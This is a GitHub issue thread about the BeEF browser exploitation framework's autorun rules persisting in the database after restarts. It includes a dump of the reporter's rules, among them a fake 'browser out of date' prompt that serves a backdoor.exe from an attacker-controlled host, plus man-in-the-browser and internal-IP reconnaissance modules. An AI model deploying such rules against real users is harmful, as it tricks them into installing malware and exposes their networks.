### ISSUE TITLE
API  'List Rules' returns null when db contains rules

### ISSUE THREAD

**Issue by lazysecurity** [beefproject/beef#1180]
after experimenting with writing some ARE rules was experiencing some odd errors that seemed to be referring to earlier rules that were no longer in the /enabled directory.  I have been restarting ./beef each time I add or remove a rule from /enabled.  

Have now restarted beef with empty /enabled folder and '/api/autorun/rule/list/1?token=xyz'
returns:

{"success":true,"rules":null}

but when hooking a new browser it appears rules still seem to be autorun.

running 'SELECT * FROM core_arerules;' on the db it returns:

SELECT * FROM core_arerules;
2|get_system_info|lazysecurity|ALL|ALL|ALL|ALL|[{"name":"get_system_info","condition":null,"options":{}}]|[0]|[0]|sequential
3|detect_software|lazysecurity|IE|ALL|Windows|ALL|[{"name":"Detect_software","condition":null,"options":{}},{"name":"clippy","condition":null,"options":{"clippydir":"http://172.16.45.1:3000/clippy/","askusertext":"Your browser appears to be out of date. Would you like to upgrade it?","executeyes":"http://172.16.45.1:3000/updates/backdoor.exe","respawntime":"5000","thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!"}}]|[0, 1]|[0, 2000]|sequential
4|detect_software|lazysecurity|IE|ALL|Windows|ALL|[{"name":"Detect_software","condition":null,"options":{}},{"name":"clippy","condition":null,"options":{"clippydir":"http://172.16.45.1:3000/clippy/","askusertext":"Your browser appears to be out of date. Would you like to upgrade it?","executeyes":"http://172.16.45.1:3000/updates/backdoor.exe","respawntime":"5000","thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!"}}]|[0, 1]|[0, 2000]|sequential
5|mib_recce|lazysecurity|ALL|ALL|ALL|ALL|[{"name":"man_in_the_browser","condition":null,"options":{}},{"name":"get_internal_ip","condition":null,"options":{}}]|[0, 1]|[0, 2000]|sequential
6|mib_recce|lazysecurity|ALL|ALL|ALL|ALL|[{"name":"man_in_the_browser","condition":null,"options":{}},{"name":"get_internal_ip","condition":null,"options":{}}]|[0, 1]|[0, 2000]|sequential
7|detect_software|lazysecurity|ALL|ALL|ALL|ALL|[{"name":"Detect_software","condition":null,"options":{}}]|[0]|[0]|sequential
8|mib_recce|lazysecurity|ALL|ALL|ALL|ALL|[{"name":"man_in_the_browser","condition":null,"options":{}},{"name":"get_internal_ip","condition":null,"options":{}}]|[0, 1]|[0, 2000]|sequential
9|mib_recce|lazysecurity|ALL|ALL|ALL|ALL|[{"name":"man_in_the_browser","condition":null,"options":{}},{"name":"get_internal_ip","condition":null,"options":{}}]|[0, 1]|[0, 2000]|sequential
10|mib_recce|lazysecurity|ALL|ALL|ALL|ALL|[{"name":"man_in_the_browser","condition":null,"options":{}},{"name":"get_internal_ip","condition":null,"options":{}}]|[0, 1]|[0, 2000]|sequential
11|mib_recce|lazysecurity|ALL|ALL|ALL|ALL|[{"name":"man_in_the_browser","condition":null,"options":{}},{"name":"get_internal_ip","condition":null,"options":{}}]|[0, 1]|[0, 2000]|sequential
12|get_internal_ip_both|lazysecurity|IE|ALL|Windows|ALL|[{"name":"get_internal_ip","condition":null,"options":{}},{"name":"get_internal_ip_webrtc","condition":null,"options":{}}]|[0, 1]|[0, 2000]|sequential
13|get_internal_ip_both|lazysecurity|IE|ALL|Windows|ALL|[{"name":"get_internal_ip","condition":null,"options":{}},{"name":"get_internal_ip_webrtc","condition":null,"options":{}}]|[0, 1]|[0, 2000]|sequential
14|get_internal_ip_both|lazysecurity|IE|ALL|Windows|ALL|[{"name":"get_internal_ip","condition":null,"options":{}},{"name":"get_internal_ip_webrtc","condition":null,"options":{}}]|[0, 1]|[0, 2000]|sequential
15|get_internal_ip_both|lazysecurity|IE|ALL|Windows|ALL|[{"name":"get_internal_ip","condition":null,"options":{}},{"name":"get_internal_ip_webrtc","condition":null,"options":{}}]|[0, 1]|[0, 2000]|sequential
16|get_internal_ip_both|lazysecurity|IE|ALL|Windows|ALL|[{"name":"get_internal_ip","condition":null,"options":{}},{"name":"get_internal_ip_webrtc","condition":null,"options":{}}]|[0, 1]|[0, 2000]|sequential
17|get_internal_ip_both|lazysecurity|IE|ALL|Windows|ALL|[{"name":"get_internal_ip","condition":null,"options":{}},{"name":"get_internal_ip_webrtc","condition":null,"options":{}}]|[0, 1]|[0, 2000]|sequential
18|get_internal_ip_both|lazysecurity|IE|ALL|Windows|ALL|[{"name":"get_internal_ip","condition":null,"options":{}},{"name":"get_internal_ip_webrtc","condition":null,"options":{}}]|[0, 1]|[0, 2000]|sequential

I'm not sure if its just the poor attempts at writing rules as its my first time ;)

**Comment by lazysecurity** [comment]
so launching with ./beef -x the rule in /enabled loads and runs fine. After stopping beef and relaunching with ./beef the rule in /enabled get loaded again and causes the issue to be repeated.

**Comment by antisnatchor** [comment]
If you launch BeEF without -x, the database is not cleaned, that's your problem.
